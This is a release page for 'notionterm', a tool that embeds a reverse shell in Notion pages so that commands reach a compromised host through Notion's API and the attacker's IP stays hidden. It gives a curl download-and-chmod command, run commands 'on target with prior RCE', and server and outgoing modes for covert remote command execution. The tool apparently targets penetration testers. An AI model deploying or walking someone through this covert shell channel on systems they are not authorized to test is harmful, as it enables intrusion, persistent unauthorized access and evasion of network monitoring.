notionterm v1.0.1 releases: Embed reverse shell in Notion pages
notionterm – Embed reverse shell in Notion pages
FOR ➕:
- Hiding attacker IP in a reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
- Demo
- Quick proof insertion within the report
- High available and shareable reverse shell (desktop, browser, mobile)
- Encrypted and authenticated remote shell
NOT FOR ➖:
- Long and interactive shell session (see tacos for that)
Why? 🤔
The focus was on making something fun while still being usable, but that’s not meant to be THE solution for reverse shell in the pentester’s arsenal
How
Just use notion as usual and launch notionterm on target.
Changelog v1.0.1
Helper script to ease usage and launching (without having to remember flag etc)
- wrap-notionterm.sh
Install
Requirements 🖊️
- Notion software and API key
- Allowed HTTP communication between the target and notion domain
- Prior RCE on target
From release: curl -lO -L https://github.com/ariary/notionterm/releases/latest/download/notionterm && chmod +x notionterm
Quickstart
Set-up
- Create the “reverse shell” page in Notion: Page template
- Give the permissions to notionterm to access the page (with the notion api key)
Run (details)
- Start notionterm
- Activate the reverse shell (with the button ON )
- do your reverse shell stuff
- Shutdown the reverse shell (OFF)
👟 Run
# On target with prior RCE
./notionterm
Configuration can be made using:
- Flags
- Configuration table in notion page
Server mode
To quickly obtain terminal in any notion page you can use the server mode (Requirement: integration w/ write access to the page)
First, Launch notionterm on target with server mode enable:
notionterm -serve [flags]
Then, when/where you want to get a terminal in your notion page create an embed block with url containing the page id (to get it)CTRL+L: https://[TARGET_URL]/notionterm?url=[PAGE_ID].
Wait…
And that’s all!
Outgoing mode
+: only target -> notion page flux (.i.e No need to have a HTTP server reachable on target)
notionterm -outgoing [flags]
Launch notionterm and immediately request notion page to retrieve command to execute (do not wait for the button to be clicked).
Copyright (C) 2022 ariary
Source: https://github.com/ariary/